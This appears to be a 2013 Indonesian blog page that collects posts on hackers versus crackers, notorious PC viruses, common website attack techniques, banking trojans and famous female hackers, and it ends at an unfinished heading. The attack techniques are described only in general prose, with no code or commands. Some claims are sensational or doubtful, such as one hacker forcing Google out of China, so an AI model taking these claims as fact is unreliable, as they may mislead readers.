Sabtu, 31 Agustus 2013

Perbedaan Hacker dan Cracker

Perbedaan Hacker & Cracker

1. Hacker

Hacker adalah sebutan untuk mereka yang memberikan sumbangan yang bermanfaat kepada jaringan komputer, membuat program kecil dan membagikannya dengan orang-orang di Internet. Sebagai contoh: digigumi (Grup Digital) adalah sebuah kelompok yang mengkhususkan diri bergerak dalam bidang game dan komputer. Digigumi ini menggunakan teknik teknik hexadecimal untuk mengubah teks yang terdapat di dalam game. Contohnya, game Chrono Trigger berbahasa Inggris dapat diubah menjadi bahasa Indonesia. Oleh karena itu, status Digigumi adalah hacker, namun bukan sebagai perusak. Hacker disini artinya, mencari, mempelajari dan mengubah sesuatu untuk keperluan hobi dan pengembangan dengan mengikuti legalitas yang telah ditentukan oleh developer game. Para hacker biasanya melakukan penyusupan-penyusupan dengan maksud memuaskan pengetahuan dan teknik. Rata-rata perusahaan yang bergerak di dunia jaringan global (internet) juga memiliki hacker. Tugasnya yaitu untuk menjaga jaringan dari kemungkinan perusakan pihak luar “cracker”, menguji jaringan dari kemungkinan lobang yang menjadi peluang para cracker mengobrak-abrik jaringannya, sebagai contoh : perusahaan asuransi dan auditing “Price Waterhouse“. Ia memiliki team hacker yang disebut dengan Tiger Team. Mereka bekerja untuk menguji sistem sekuriti client mereka.
2. Cracker

Cracker adalah sebutan untuk mereka yang masuk ke sistem orang lain dan cracker lebih bersifat destruktif, biasanya di jaringan komputer, mem-bypass password atau lisensi program komputer, secara sengaja melawan keamanan komputer, men-deface (merubah halaman muka web) milik orang lain bahkan hingga men-delete data orang lain, mencuri data dan umumnya melakukan cracking untuk keuntungan sendiri, maksud jahat, atau karena sebab lainnya karena ada tantangan. Beberapa proses pembobolan dilakukan untuk menunjukan kelemahan keamanan sistem.
Perbedaan Hacker dan Cracker
a. Hacker
  1. Mempunyai kemampuan menganalisa kelemahan suatu sistem atau situs. Sebagai contoh : jika seorang hacker mencoba menguji situs Yahoo! dipastikan isi situs tersebut tak akan berantakan dan mengganggu yang lain. Biasanya hacker melaporkan kejadian ini untuk diperbaiki menjadi sempurna.
  2. Hacker mempunyai etika serta kreatif dalam merancang suatu program yang berguna bagi siapa saja.
  3. Seorang Hacker tidak pelit membagi ilmunya kepada orang-orang yang serius atas nama ilmu pengetahuan dan kebaikan.
b. Cracker
  1. Mampu membuat suatu program bagi kepentingan dirinya sendiri dan bersifat destruktif atau merusak dan menjadikannya suatu keuntungan. Sebagian contoh : Virus, Pencurian Kartu Kredit, Kode Warez, Pembobolan Rekening Bank, Pencurian Password E-mail/Web Server.
  2. Bisa berdiri sendiri atau berkelompok dalam bertindak.
  3. Mempunyai situs atau cenel dalam IRC yang tersembunyi, hanya orang-orang tertentu yang bisa mengaksesnya.
  4. Mempunyai IP yang tidak bisa dilacak.
  5. Kasus yang paling sering ialah Carding yaitu Pencurian Kartu Kredit, kemudian pembobolan situs dan mengubah segala isinya menjadi berantakan. Sebagai contoh : Yahoo! pernah mengalami kejadian seperti ini sehingga tidak bisa diakses dalam waktu yang lama, kasus clickBCA.com yang paling hangat dibicarakan tahun 2001 lalu.
Dua Jenis Kegiatan Hacking

1. Social Hacking, yang perlu diketahui : informasi tentang system apa yang dipergunakan oleh server, siapa pemilik server, siapa Admin yang mengelola server, koneksi yang dipergunakan jenis apa lalu bagaimana server itu tersambung internet, mempergunakan koneksi siapa lalu informasi apa saja yang disediakan oleh server tersebut, apakah server tersebut juga tersambung dengan LAN di sebuah organisasi dan informasi lainnya
2. Technical Hacking, merupakan tindakan teknis untuk melakukan penyusupan ke dalam system,  baik dengan alat bantu (tool) atau dengan mempergunakan fasilitas system itu sendiri yang dipergunakan untuk menyerang kelemahan (lubang keamanan) yang terdapat dalam system atau service. Inti dari kegiatan ini adalah mendapatkan akses penuh kedalam system dengan cara apapun dan bagaimana pun.
Contoh Kasus Hacker

1. Pada tahun 1983, pertama kalinya FBI menangkap kelompok kriminal komputer The 414s (414 merupakan kode area lokal mereka) yang berbasis di Milwaukee AS. Kelompok yang kemudian disebut hacker tersebut melakukan pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Salah seorang dari antara pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan.
2. Digigumi (Grup Digital) adalah sebuah kelompok yang mengkhususkan diri bergerak dalam bidang game dan komputer dengan menggunakan teknik teknik hexadecimal untuk mengubah teks yang terdapat di dalam game. Contohnya : game Chrono Trigger berbahasa Inggris dapat diubah menjadi bahasa Indonesia. Oleh karena itu, status Digigumi adalah hacker, namun bukan sebagai perusak.
3. Pada hari Sabtu, 17 April 2004, Dani Firmansyah, konsultan Teknologi Informasi (TI) PT Danareksa di Jakarta  berhasil membobol situs milik Komisi Pemilihan Umum (KPU) di http://tnp.kpu.go.id dan mengubah nama-nama partai di dalamnya menjadi nama-nama “unik”, seperti Partai Kolor Ijo, Partai Mbah Jambon, Partai Jambu, dan lain sebagainya. Dani menggunakan teknik SQL Injection (pada dasarnya teknik tersebut adalah dengan cara mengetikkan string atau perintah tertentu di address bar browser) untuk menjebol situs KPU. Kemudian Dani tertangkap pada hari  Kamis, 22 April 2004.
Akibat yang Ditimbulkan oleh Hacker dan Cracker

Hacker : membuat teknologi internet semakin maju karena hacker menggunakan keahliannya dalam hal komputer untuk melihat, menemukan dan memperbaiki kelemahan sistem keamanan dalam sebuah sistem komputer ataupun dalam sebuah software, membuat gairah bekerja seorang administrator kembali hidup karena hacker membantu administrator untuk memperkuat jaringan mereka.

Cracker : merusak dan melumpuhkan keseluruhan sistem komputer, sehingga data-data pengguna jaringan rusak, hilang, ataupun berubah.
Kesimpulan
Para hacker menggunakan keahliannya dalam hal komputer untuk melihat, menemukan dan memperbaiki kelemahan sistem keamanan dalam sebuah sistem komputer ataupun dalam sebuah software. Oleh karena itu, berkat para hacker-lah Internet ada dan dapat kita nikmati seperti sekarang ini, bahkan terus di perbaiki untuk menjadi sistem yang lebih baik lagi. Maka hacker dapat disebut sebagai pahlawan jaringan sedang cracker dapat disebut sebagai penjahat jaringan karena melakukan melakukan penyusupan dengan maksud menguntungkan dirinya secara personallity dengan maksud merugikan orang lain. Hacker sering disebut hacker putih (yang merupakan hacker sejati yang sifatnya membangun) dan hacker hitam (cracker yang sifatnya membongkar dan merusak)

10 Virus PC Terganas Di Dunia


https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIJZiyBltcxVoaZpTCg4s1Gy9GyqTiK_PDk_80tv6AICOdPqncfDuy4SA8dtKLp9LEZKlIEMgO9xF1JkQ6caE7hnmZQLanf09J-5kZxkq9E3fZf6H6bnVZTd1pT7WDmQaMG55Wog8qmBQp/s320/virus-detected.jpg

 
1. Storm Worm
Muncul tahun 2006, disebut “Storm Worm” karena menyebar via email dengan judul “230 dead as storm batters Europe”. Storm worm adalah program Trojan horse. Beberapa versinya bisa buat komputer menjadi bots. Atau biasa digunakan hacker untuk spam mail melalui internet.
 
2. Leap-A/Oompa- A
Mac yang punya konsep security through obscurity yakin tidak akan terserang virus karena OS nya sistem tertutup. Tapi tahun 2006, virus Leap-A atau biasa disebut Oompa-A muncul. Menyebar lewat iChat pada Mac. Setelah Mac terserang, virus itu akan mencari kontak melalui iChat dan mengirimkan pesan ke setiap kontak itu. Pesannya itu berisi file corrupt yang berbentuk JPEG. Memang tidak berbahaya, namun hal ini menyatakan bahwa masih mungkin akan ada virus berbahaya yang menyerang MAC.
  
3. Sasser and Netsky
Penciptanya anak Jerman umur 17 tahun, Sven Jaschan. Sasser menyerang Microsoft Windows. Sasser ini tidak menyebar via email tapi jika satu komputer terkoneksi ke komputer yang kena virus ini. Virus ini membuat komputer tidak bisa di-shutdown tanpa mencabut power. Netsky nyebar melalui email dengan 22 Kb attachment file dan jaringan Windows. Bisa bikin serangan DoS. Sven Jaschan tidak dipenjara hanya diberi masa percobaan 1 tahun 9 bulan, karena umurnya masih di bawah 18 tahun.
 
4. MyDome (Novarg)
Mulai menyerang tanggal 1 Februari 2004, Virus ini membuat backdoor di OS. Pertama kali tanggal 1 itu mulai DDoS. Kedua, tanggal 12 Feb, virus ini berhenti menyebar dan mulai buat backdoors. MyDoom menyebar via email, selain itu selalu search di search engines, seperti Google mulai menerima jutaan permintaan pencarian dan bikin lambat sampai akhirnya crash. Gara-gara MyDoom, Senator US Chuck Schumer mengajukan pembuatan National Virus Response Center. 
 
5. SQL Slammer/Saphire
Muncul Januari 2003, menyebar cepat lewat internet. Waktu itu membuat layanan ATM Bank Amerika crash, hancurnya layanan 911 Seattle, dan Continental Airlines membatalkan beberapa penerbangan karena error check in dan ticketing. Bikin rugi lebih dari $1 milliar sebelum di-pacthed. 
 

6. Nimda
Ini juga tahun 2001, kebalikan dari kata “admiN”. Penyebarannya sangat cepat, menurut TruSecure CTO Peter Tippet, Nimda hanya butuh 22 menit buat menjadi Top Ten saat itu. Target nya server-server Internet, menyebar lewat Internet. Nimda akan membuat backdoor ke OS. jadi penyerang bisa akses ke server dan berbuat apa saja. Nimda juga menjadi DDoS.
 
7. Code Red & Code Red II
Muncul musim panas 2001, menyerang OS Windows 2000 & NT. Virusnya bakal membuat buffer penuh sehingga menghabiskan memori. Paling seru waktu berhubungan sama White House, semua komputer yang kena virus ini bakalan otomatis akses ke web server di White House secara bersamaan, jadi bikin overload, alias serangan DDoS. Akhirnya Microsoft rilis patchnya saat itu.
 
8. The Klez
Muncul tahun 2001, menyebar via email, replikasi kemudian terkirim ke orang-orang di address book. Bikin komputer tidak bisa beroperasi, bisa mematikan program antivirus.
 
9. ILOVEYOU
Setelah “Melissa”, muncul dia dari Filipina, bentuk nya worm, program standalone dapat me-replikasi sendiri. Menyebar via email, judulnya”surat cinta” dari pengagum rahasia . Original file nya LOVE-LETTER- FOR-YOU.TXT. vbs. VBS singkatan Visual Basic Scripting. Penciptanya adalah Onel de Guzman dari Filipina. 
 

10. Melissa
Dibikin tahun 1999 oleh David L Smith, basicnya Microsoft Word macro. Menyebar via email dengan dokumen “Here is that document you asked for, don’t show it to anybodey else.”. Kalau sampai dibuka, virus akan replikasi dan otomatis terkirim ke top 50 di address book email. Smith dipenjara 20 bulan dan denda $5000 serta dilarang mengakses komputer tanpa pengawasan.

Cara hacker menembus website

     

       Mungkin  agan2 sekalian sudah banyak yang mengetahui apa yang di maksud dengan hacker. seperti yang telah sobat pernah baca di artikel lainnya di blog ini yang juga banyak mengulas tentang hacker. Adapun cara hacker menembus atau pun menyusup dan juga merusak suatu website adalah sebagai berikut.Teknik teknik itu antara lain:

1. IP Spoofing
2. FTP Attack
3. Unix Finger Exploits
4. Flooding & Broadcasting
5. Fragmented Packet Attacks
6. E-mail Exploits
7. DNS and BIND Vulnerabilities
8. Password Attacks
9.Proxy Server Attacks
10. Remote Command Processing Attacks
11. Remote File System Attack
12. Selective Program Insertions
13. Port Scanning
14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
15. HTTPD Attacks

1. IP Spoofing
IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C.

IP Spoofing terjadi ketika seorang attacker ?mengakali? packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker

2. FTP Attack
Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service. Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang.

3. Unix Finger Exploits
Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact.

Utility ini juga Menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha kracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar ?memberitahu? password dan kode akses terhadap system.

4. Flooding & Broadcasting
Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang Menyediakan informasi menjadi lemah dan akhirnya menyerah.

Serangan dengan cara flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan

5. Fragmented Packet Attacks
Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya mengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash. Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk menulis ulang informasi paket pertama dari suatu protokol

6. E-mail Exploits
Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode (malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function)

7. DNS and BIND Vulnerabilities
Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain (BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis yang diarahkan pada operasi dasar dari Internet (basic internet operation)

8. Password Attacks
Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP. Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh password. 

Ketika seorang attacker berhasil mendapatkan password yang dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai hal ini dengan cara teknikal. Kebanyakan serangan yang dilakukan terhadap password adalah menebak (guessing), brute force, kracking dan sniffing

9.Proxy Server Attacks
Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan proses dari beberapa host dalam suatu trusted network

10. Remote Command Processing Attacks
Trusted Relationship antara dua atau lebih host Menyediakan fasilitas pertukaran informasi dan resource sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota network kekuasaan akses yang sama di satu dan lain system (dalam network).
Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi perintah dan mengkases data yang tersedia bagi user lainnya

11. Remote File System Attack
Protocol-protokol untuk tranportasi data ?tulang punggung dari internet? adalah tingkat TCP (TCPLevel) yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk mendapatkan akses ke direktori file

12. Selective Program Insertions
Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ?) pada system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan membuka backdoor

13. Port Scanning
Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi. Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack

14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
Interception TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force, serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like

15. HTTPD Attacks
Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd bypasses, cross scripting, web code vulnerabilities, dan URL floods

Virus Pencuri Uang

Virus pencuri uang

Berbagai jenis virus telah kita dengar atau bahkan dihadapkan langsung bagi pengguna komputer. Virus komputer ini merupakan program yang dibuat untuk menggandakan dan merusak sistem yang ada. Biasanya komputer akan menjadi lambat dan kacau cara kerjanya. Sebelumnya kami sempat posting tentang Virus komputer terganans di dunia namun Dewasa ini virus tersebut dibuat lebih canggih dan tidak merusak program yang ada. Sangat canggihnya bahkan sampai ada yang menyerang Dunia Perbankan. Seperti apa Virus Pencuri uang dalam perbankan tersebut, silahkan simak artikel dibawah ini.


1. Zeus v3
Para peretas asal Eropa Timur menggunakan virus komputer yang rumit untuk menyedot tabungan dari ribuan nasabah bank Inggris, demikian kata pakar internet seperti yang dikutip The Telegraph, Rabu (11/8). Versi terbaru dari virus ganas 'Zeus' yang tidak terlacak oleh 'firewall' tradisional itu dilaporkan telah berhasil menggondol 675.000 Poundsterling dari kira-kira 3000 nasabah 'online' dari sebuah bank Inggris.
Sejak Juli dana itu ditransfer dari akun-akun online milik perusahaan maupun perorangan. Para ahli internet dari M86 Security, yang khusus menangani permasalahan 'online', mengungkapkan virus itu bekerja dengan mengecek jumlah uang dalam sebuah akun, mencurinya, dan menutupi jejak dengan menampilkan rekening bank palsu kepada nasabah. Sahabat anehdidunia.com perusahaan keamanan internet yang bermarkas di California dan Inggris itu membongkar rencana jahat tersebut ketika berhasil masuk ke dalam 'server command' para maling yang berbasis di Eropa Timur dan menemukan daftar transfer uang.
Para pakar itu kemudian membuat laporan yang menjelaskan proses serangan itu dan menginformasikannya kepada polisi maupun bank yang bersangkutan dua pekan silam. Mereka juga mengakui serangan itu akan terus berlanjut. Virus 'Zeus' yang mengincar rekening bank pertama kali muncul tiga tahun lalu. Versi terbarunya, 'Zeus v3', tidak hanya mencuri data 'login', kata kunci, dan detail bank, tetapi juga bisa mentransfer uang dari rekening yang diinginkan.
"Ini adalah versi yang paling rumit dari virus Zeus dan tidak bisa dideteksi oleh piranti lunak keamanan tradisional," kata Bradley Anstis, wakil presiden bidang teknis pada M86 kepada The Times. Virus itu pun ternyata tidak hanya terdapat di area-area 'lampu merah' seperti situs-situs judi atau porno tetapi juga di situs yang lebih populer seperti mesin pencari, blog, atau situs berita.
Tahun lalu virus itu ditemukan pada sebuah iklan di laman web New York Times. M86 Security mengatakan komputer nasabah bank online tertular virus itu dari laman-laman web resmi melalui 'lubang' di Internet Explorer dari Microsoft atau aplikasi-aplikasi dari Adobe Reader. Begitu komputer terinfeksi, virus yang termasuk 'spyware Trojan' itu bersembunyi dalam 'browser' pengguna komputer sampai tersambung ke rekening bank mereka.
  Virus itu akan mulai bekerja ketika nasabah mengecek rekening mereka lalu memeriksa jumlah rekening itu. Jika rekening itu berisi lebih dari 800 Poundsterling maka virus itu mulai memindahkan uang itu secara tersembunyi ke 'rekening sementara', sebuah rekening yang dimiliki oleh nasabah resmi yang juga telah dibajak para peretas itu. Bank-bank utama Inggris menolak untuk berkomentar terkait kemungkinan nasabah mereka menjadi salah satu korban para peretas Eropa Timur itu. Organisasi perdagangan Inggris (United Kingdom Payments Administration) mengatakan korban kejahatan perbankan secara online meningkat 18 persen tahun lalu menjadi 59,7 juta Poundsterling.

2. Citadel
Pada zaman dulu Citadel digunakan sebagai pertahanan terakhir sebuah kerajaan. Makanya, biasanya bentuknya besar, kokoh, serta dilengkapi dengan berbagai sistem persenjataan. Di masa modern ini nama Citadel justru dicatut para penjahat cyber untuk menamakan sebuah virus ganas. Virus yang dirancang khusus untuk menguras rekening korbannya.
Citadel merupakan virus yang dibuat dari source code Zeus, salah satu virus yang juga cukup canggih. Bedanya Citadel memang dibuat khusus untuk menyerang internet banking. Virus Citadel mulai ditemukan pada Januari 2012 lalu, sejak itu program jahat ini terus dikembangkan hingga mencapai versi tercanggihnya di Oktober 2013. Hingga kini virus tersebut diduga masih beredar dengan bebas.
3. Tinba
Salah satu pengamat virus bernama Amit Klein menuliskan banyak cerita soal Tinba di blog pribadinya. Ini merupakan salah satu virus penyerang internet banking yang patut Tinba muncul dari komunitas peretas bawah tanah sekitar 9 bulan lalu. Program jahat ini memang dirancang untuk mencuri uang.
Awalnya metode yang digunakan Tinba masih tergolong biasa, bahkan bisa dikatakan sedikit jadul dibanding dengan virus sejenisnya. Tapi pada Januari 2013 ditemukan versi baru Tinba yang lebih canggih, bahkan bisa mengakali sitem otentifikasi dua arah dari bank.
"Saat korban mengakses halaman bank mereka, Tinba akan menampilkan halaman yang sangat mirip dengan bank tersebut," tulis Klein. Namun saat mencoba login ke dalam halaman tersebut, pengguna justru ditampilkan halaman yang error. Di sinilah proses pencurian data dimulai.

4. Eurograbber
Sesuai dengan namanya. Virus ini memang dibuat untuk menguras uang para pengguna internet banking di Eropa, bahkan hingga akhir 2012 lalu sedikitnya ada 36 juta euro (sekitar Rp 455 miliar) yang berhasil ditilep virus tersebut.
Eurograbber kali pertama ditemukan oleh lembaga keamanan bernama Check Point Software Technologies, kemudian dibantu juga oleh lembaga lain dari Israel bernama Versafe. Mereka mengatakan bahwa program jahat ini memang dirancang untuk menyerang sektor perbankan.
Dalam operasinya virus itu tidak hanya menyerang melalui komputer, tapi juga menyusup ke dalam ponsel pintar para calon korbannya. Sahabat anehdidunia.com setelah berhasil masuk, ia akan mendownload beberapa komponen aplikasi untuk bisa beraksi. Eurograbber pertama kali ditemukan di Italia, kemudian menyebar ke sejumlah wilayah Eropa seperti Jerman, Belanda dan Spanyol. Setidaknya ada ribuan korban dari 30 bank berbeda yang berhasil diinfeksi virus.

5. SpyEye
Analisis dan Guardian dan McAfee mengumumkan temuan virus baru bernama SpyEye. Konon program jahat ini dibuat oleh programmer yang mengerti betul soal sistem kerja internet banking. Sama seperti Citadel, SpyEye dibuat berdasarkan source code dari Zeus. Hanya saja program ini menyerang target tertentu, misalnya transaksi perusahaan, atau pengguna yang punya tabungan sangat banyak.
SpyEye dikatakan hebat karena berhasil menghindari berbagai sistem proteksi. Bahkan virus ini dikatakan tergolong cerdik, hingga sulit mendeteksinya saat transaksi berlangsung. "Mereka tahu bagaimana untuk membuat transaksi yang seolah-olah terjadi. Jelas sekali, orang-orang ini (pembuat-red) mengetahui lebih dari sekadar memahami internet banking," kata David Marcus, Director of Advanced Research and Threat Intelligence McAfee, seperti dikutip detikINET dari CRN.

6. Gozi-Prinimalka
Kalau Eurograbber Menyerang sistem perbanjan, maka Gozi-Prinimalka dibuat untuk menghajar sistem internet banking di Amerika Serikat. Trend Micro berhasil menangkap dan menganalisa Gozi-Prinimalka, setelah dibedah ternyata program jahat ini punya beberapa keunikan dibanding aplikasi sejenisnya.
Untuk mencuri informasi dari korbannya, virus ini akan terlebih dahulu membuat backdoor menggunakan eklpoitasi Java Script. Ada dua backdoor yang akan dibuat, BKDR_URSNIF.B dan BKDR_URSNIF.DN keduanya sama-sama terkoneksi secara real time dengan sistem kendali virus tersebut. Data yang dicuri virus ini pun tak hanya yang tersimpan di dalam hardisk, tapi juga memori sementara yang disimpan di dalam browser.
Di Amerika virus ini setidaknya sudah membuat resah 3 instansi perbankan, mereka adalah TDBank, Firstrade, Options Xpress. Ketiganya kemudian melakukan perbaikan sistem untuk menangkis serangan tersebut.
7. High Roller
Virus terakhir yang menyebarkan cukup banyak teror adalah High Roller. Konon ini adalah salah satu serangan terbesar di industri perbankan dunia. Tidak seperti program jahat lainnya yang hanya menyerang secara sembunyi-sembunyi, High Roller bisa melancarkan serangan dengan membabi buta dari berbagai arah.
Virus ini semakin sulit dilacak karena tidak memiliki Comand Center dalam bentuk fisik. Pelaku cukup cerdas untuk membuat sistem kendali ini di 'awan', sehingga sulit dilacak. Pada dasarnya High Roller dibuat dari gabungan virus Zeus dan SpyEye, kemudian di dalamnya juga ada beberapa teknik pencurian informasi konvensional yang biasa terjadi di dunia maya.
Teknologi canggih yang dimiliki High Roller membuatnya cukup sulit diberangus, bahkan hingga saat ini. Oleh sebab itu seluruh pihak perbankan disarankan untuk tetap waspada.
"Dengan menggunakan sistem cloud, High Roller memiliki teknik penyerangan yang baru. Mereka sulit dianalisa dan sulit untuk dideteksi keberadaannya," kata Chris Silveira, Manager of Fraud Intelligence dari Guardian Analytics.

Sahabat anehdidunia.com semakin canggih pertahanan sebuah system, semakin canggih juga cara kerja peretas untuk membongkar pertahanan system tersebut. Sepertinya Hitam Putih Dunia akan selalu melekat sepanjang zaman.

5 Hacker Wanita Terkenal di Dunia

       hacker yang dulu sering didominasi oleh cowok, sekarang tidak menutup kemungkinan adanya hacker hacker cewek. Hacking, dunia bawah tanah keras nan unik. Kebanyakan ahli-ahli dalam bidang hacking didominasi oleh kalangan pria. Tapi, siapa sangka ternyata wanita juga banyak ambil bagian dalam dunia ini. Kemampuan serta kiprahnya pun tidak kalah dengan kaum adam. Berikut ini adalah 5 Hacker wanita Paling eksis di Dunia :

1.Xiao Tian




Teringat dengan kata hacker, biasanya yang terlintas di bayangan adalah seorang kutu buku dengan kaca mata tebal dengan gaya hidup yang acak-acakan. Tapi tidak berlaku untuk Xiao Tian.
Sahabat anehdidunia.blogspot, dia adalah seorang hacker yang modis.Penampilan dan gaya hidupnya begitu rapi, dinamis bahkan terkesan feminim. ia juga tertarik sekali dengan dunia fashion, khususnya sepatu.

Dalam blog nya dia sering berbagi cerita tentang tempat-tempat yang pernah dia datangi. Itulah alasan mengapa Xiao memiliki banyak fans dan followers di dunia, khususnya para pria. Xiao Tian, mulai dikenal sejak umur 19 tahun. Setelah membentuk China Girl Security Team, salah satu kelompok hacker khusus wanita terbesar di china. Kiprahnya dalam dunia hacking juga tidak diragukan lagi.

Raksasa search engine nomor satu di dunia, Google pun pernah merasakan serangan hebat dari Tian beserta timnya. Xiao Tian melakukan serangan canggih terhadap sistem infrastruktur google china. Bahkan, google akhirnya tidak tahan dan memilih untuk menarik semua layanan operasionalnya di China akibat hantaman hacker yang bertubi-tubi tersebut.

2.Ying Cracker



Ying Cracker, seorang pengajar dari shanghai Cina. Dia mengajar tentang panduan dasar proses hacking, cara merubah IP address atau memanipulasi password kantor! Dia juga ahli dalam membuat software hacker.

Dalam sebuah forum yang berjudul Chinese Hottie Hackers, namanya banyak dibahas dan itu membuat popularitasnya semakin menanjak. Dalam forum tersebut juga dia mempunyai anggota fans yang cukup banyak. Disitulah awal kredibilitasnya melambung.

3. Kristina Svechinskaya



Kristina Svechinskaya adalah seorang mahasiswi New York University yang ditahan pada 2 november 2010 lalu karena telah membobol jutaan dollar dari beberapa bank di Inggris dan Amerika. Bersama 9 orang lainya, Svechinskaya meng-hack ribuan rekening bank dan diperkirakan total fresh money yang telah digasaknya itu sekitar 3 juta dollar.

Svechinskaya beserta tim awalnya menargetkan jumlah uang yang dicurinya adalah sekitar 220 juta dollar. Svechinskaya menggunakan Zeus Trojan Horse untuk menyerang ribuan rekening bank. Dia memiliki setidaknya 5 rekening bank dunia untuk mencairkan dananya.

Dalam aksinya itu, Svechinskaya juga melakukan pemalsuan paspor dan untuk itu total dia dituntut hukuman 40 tahun penjara bila terbukti bersalah. Seperti dilihat di gambar, bra yang digunakan gadis cantik ini terbuat dari berlian. Svechinskaya juga mendapat julukan sebagai hacker terseksi di dunia. Ya, karena memang tampilan wajah, tatapan mata dan gaya berbusana Svechinskaya bisa membuat orang-orang tak berkedip.

4.Joanna Rutkowska



